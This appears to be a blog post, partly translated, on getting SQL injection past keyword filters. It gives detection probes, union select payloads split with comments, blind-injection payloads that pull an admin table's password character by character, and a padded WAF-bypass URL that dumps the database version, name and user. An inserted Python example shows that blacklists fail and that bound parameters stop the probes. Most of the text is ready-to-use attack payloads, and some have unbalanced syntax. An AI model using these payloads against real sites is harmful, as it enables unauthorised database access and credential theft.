The usual way to check whether a website has an injection point is to append "'", "and 1=1" or "and 1=2", but these strings are certainly filtered out.
First, detection:
We can also test with null: and 1 is null, and 1 is not null
Nor is "=" required. Other operators work as well: >=, <=, is null, is not null, <>, and so on.
For example: and 2<=3
Next we will talk about injection.
For injection values, we are familiar with union select and blind injection.
Union Select
For conventional injection, we can use union select 1,2,3,4 or union/**/select/*/1,2,3,4
When the statement takes multiple parameters, such as select * from table where id = 1 and name = xxx, we can do this:
id=1+union/*&name=*/select+1,2
The statement then becomes:
select * from table where id = 1 union/* and name = xxx */select 1, 2, 4, 4
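Why filtering these strings does not fix the problem, as an added example that is not part of the original article: a keyword blacklist lets the null and comparison probes and the comment-split union through, while a bound parameter treats the whole value as data. It runs on Python's sqlite3 with a constructed two-row table; the table, the blacklist and all function names are assumptions made for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [(1, "widget"), (2, "gadget")])
    return conn

# Hypothetical keyword blacklist of the kind the article assumes is in place.
BLOCKED = ("'", "1=1", "1=2", "unionselect")

def blacklist_allows(value):
    # Lower-case and drop whitespace, then look for the blocked strings.
    compact = re.sub(r"\s+", "", value.lower())
    return not any(token in compact for token in BLOCKED)

def lookup_concat(conn, value):
    # Vulnerable: the request value becomes part of the SQL text.
    sql = "SELECT id, name FROM items WHERE id = " + value
    return conn.execute(sql).fetchall()

def lookup_bound(conn, value):
    # Hardened: the value is bound as data and is never parsed as SQL.
    return conn.execute("SELECT id, name FROM items WHERE id = ?",
                        (value,)).fetchall()

if __name__ == "__main__":
    conn = make_db()
    probes = ["1 and 1=1", "1 and 1 is not null", "1 and 1 is null",
              "1 and 2<=3", "-1 union/**/select 1,2"]
    for p in probes:
        if not blacklist_allows(p):
            print(f"{p!r}: blocked by blacklist")
            continue
        print(f"{p!r}: concat={lookup_concat(conn, p)} "
              f"bound={lookup_bound(conn, p)}")
```

With the bound query every probe returns no rows, so there is no true/false difference left to observe and no blacklist to maintain.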
Next, let's talk about blind injection.
Generally: ascii(substring(password,) = xx, or
ord(mid(password, 1, 1) = xx
I recommend that you use subqueries.
I would like to recommend some new methods from a blog:
find_in_set example: find_in_set('56', ascii(substr(password, 1, 1) = 1
strcmp example: strcmp(left('Password', 1), 0x56) = 1
Set these functions as subqueries:
id=1+and+strcmp(substring(select+password+from+admin+limit+),),0x55)=1
False
id=1+and+strcmp(substring(select+password+from+admin+limit+),),0x56)=0
True
id=1+and+strcmp(substring(select+password+from+admin+limit+),),0x57)=-1
False
An impressive method from a foreign researcher
http://www.xxx.com/index.php?content=more_product&id=-17 and (select 1)=(select 0xaaaa[... long run of "a" padding ...]aaaa)+/*!union*/+select+1,2,4,5,6-+-
http://www.xxx.com/index.php?content=more_product&id=-17 and (select 1)=(select 0xaaaa[... long run of "a" padding ...]aaaa)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),user(),3,4,5,6-+-
Author XSnake's Blog